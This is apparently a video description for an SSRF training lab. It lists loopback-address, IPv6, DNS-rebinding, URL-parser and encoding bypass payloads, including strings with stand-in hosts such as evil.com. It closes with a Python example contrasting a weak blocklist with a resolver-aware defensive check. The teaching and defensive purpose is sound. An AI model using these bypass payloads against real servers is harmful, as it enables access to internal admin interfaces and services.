
SSRF Lab: SSRF with blacklist-based input filter

27 views
Apr 26, 2026
3:49

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

1. Alternative IP representations (core bypasses)

These work because the resolver normalizes differently from the filter: a blocklist compares the literal string "127.0.0.1", while inet_aton() accepts short, zero-padded, integer, octal and hex forms that all mean the same address.

IPv4 variants
  127.0.0.1
  127.1
  127.000.000.001
  127.0.1
  127.1.1.1 (any address in 127.0.0.0/8 is loopback)
Integer (DWORD)
  2130706433
Octal
  017700000001
Hex
  0x7f000001
Mixed encoding
  127.0x0.0.1
  0x7f.0.0.1

2. IPv6 tricks (very powerful)

Many filters forget IPv6 entirely.
  ::1
  [::1]
  0:0:0:0:0:0:0:1
  [::ffff:127.0.0.1]  <- IPv4-mapped IPv6 (important: a filter that only looks for IPv4 literals never sees 127.0.0.1 here, but the socket layer connects to it)

3. DNS-based bypasses (your "own domain" idea)

This is where things get interesting: the filter sees a hostname, and the server resolves it to whatever address you chose.

Custom domain pointing to localhost
  attacker.com -> 127.0.0.1 (an A record on a domain you control)
Wildcard DNS services
  127.0.0.1.nip.io
  127.0.0.1.xip.io (xip.io has since been shut down; nip.io still works)
Rebinding attacks (advanced)
  The domain resolves to a public IP when the filter looks it up, then switches to 127.0.0.1 when the fetch happens. Works when the server resolves DNS twice (once to check, once to connect) or resolves late, i.e. there is a TOCTOU gap between the check and the use.

4. URL parser confusion tricks

Filters often check the raw input, but the backend HTTP client parses it differently, so the host the filter inspects and the host the client actually connects to can be two different strings.

Username@host bypass
  http://localhost@evil.com
  http://127.0.0.1@evil.com
  (a standards-following parser treats everything before the @ as userinfo, so the real host is evil.com; some filters instead take localhost as the host)
Fragment bypass
  http://127.0.0.1#@evil.com
  (the real host is 127.0.0.1; a filter that splits on the last @ sees evil.com)
Double @ trick
  http://127.0.0.1@@evil.com
Semicolon trick
  http://127.0.0.1;evil.com

Which side of the confusion you need depends on the filter: against a blocklist, the blocked host has to be what the client ends up connecting to, and the harmless-looking string has to be what the filter reads.

5. Encoding tricks (very common in labs)

URL encoding
  http://%31%32%37.0.0.1
  http://127.0.0.%31
Double encoding
  %252e -> decoded once becomes %2e -> decoded again becomes . (works when the filter decodes once and the backend decodes a second time)
Mixed encoding
  http://127%2e0%2e0%2e1
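The following is an added example, not code from the video or from the lab, showing why the payloads above get past a substring blocklist and what a resolver-aware check has to do instead. The weak filter (weak_blocklist_allows), the hardened check (is_internal, allowed_addresses) and the fake resolver standing in for a nip.io-style wildcard record are all constructed here for illustration; urllib.parse.urlsplit plays the client-side URL parser and socket.inet_aton plays the C resolver that normalizes the IPv4 spellings.

```python
"""Added example: substring blocklist vs. resolver-aware SSRF check (not the lab's code)."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Loopback spellings from the list above (constructed sample input). inet_aton()
# interprets every one of them as 127.0.0.1, yet none contains that string.
LOOPBACK_VARIANTS = [
    "127.1", "127.000.000.001", "127.0.1", "127.1.1.1",   # short / padded / other 127/8
    "2130706433",                                         # integer (DWORD)
    "017700000001",                                       # octal
    "0x7f000001",                                         # hex
    "127.0x0.0.1", "0x7f.0.0.1",                          # mixed per-octet encodings
]


def weak_blocklist_allows(url):
    """Constructed stand-in for a blocklist filter: substring match on the raw input."""
    lowered = url.lower()
    return not any(bad in lowered for bad in ("127.0.0.1", "localhost"))


def client_host(url):
    """Host a standards-following client would connect to (userinfo stripped, fragment ignored)."""
    return urlsplit(url).hostname or ""


def normalize_ipv4_literal(host):
    """Dotted quad as inet_aton() interprets `host`, or None if it is not an IPv4 literal.
    This normalization is the step a filter must do before comparing anything."""
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return None


def is_internal(host):
    """True/False for an IP literal (normalized, IPv4-mapped IPv6 unwrapped);
    None when `host` is a DNS name and a resolver decision is still needed."""
    h = host.strip("[]")
    dotted = normalize_ipv4_literal(h)
    try:
        addr = ipaddress.ip_address(dotted or h)
    except ValueError:
        return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                      # [::ffff:127.0.0.1] -> 127.0.0.1
    return bool(addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_unspecified)


def _system_resolver(name):
    """Every address the name resolves to; an unresolvable name yields nothing."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None)})
    except socket.gaierror:
        return []


def allowed_addresses(host, resolver=_system_resolver):
    """Addresses a fetch may connect to, or [] if the target is internal.
    `resolver` is injectable so the DNS-based bypasses can be exercised offline."""
    verdict = is_internal(host)
    if verdict is not None:                          # an IP literal: decide directly
        return [] if verdict else [host.strip("[]")]
    addrs = resolver(host)
    if not addrs or any(is_internal(a) for a in addrs):
        return []                                    # nip.io / own-domain -> 127.0.0.1 denied
    return addrs


def classify(url, resolver=_system_resolver):
    """Weak filter verdict next to what the client would really reach."""
    host = client_host(url)
    return {
        "weak_filter_allows": weak_blocklist_allows(url),
        "client_host": host,
        "hardened_allows": bool(allowed_addresses(host, resolver)) if host else False,
    }


if __name__ == "__main__":
    fake_dns = lambda name: ["127.0.0.1"]            # what 127.0.0.1.nip.io resolves to
    for u in ["http://127.0.0.1/admin", "http://127.1/admin", "http://0x7f000001/admin",
              "http://[::ffff:127.0.0.1]/admin", "http://localhost@evil.com/",
              "http://127.0.0.1#@evil.com/", "http://127.0.0.1.nip.io/admin"]:
        print(f"{u:36} {classify(u, fake_dns)}")
```

The hardened side is only half the fix: after allowed_addresses() returns, the fetch must connect to one of those exact addresses (sending the original name in the Host header) rather than resolving the name again, otherwise the rebinding case in section 3 still wins, and any redirect the fetched server returns has to go through the same check.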


SSRF Lab: SSRF with blacklist-based input filter | NatokHD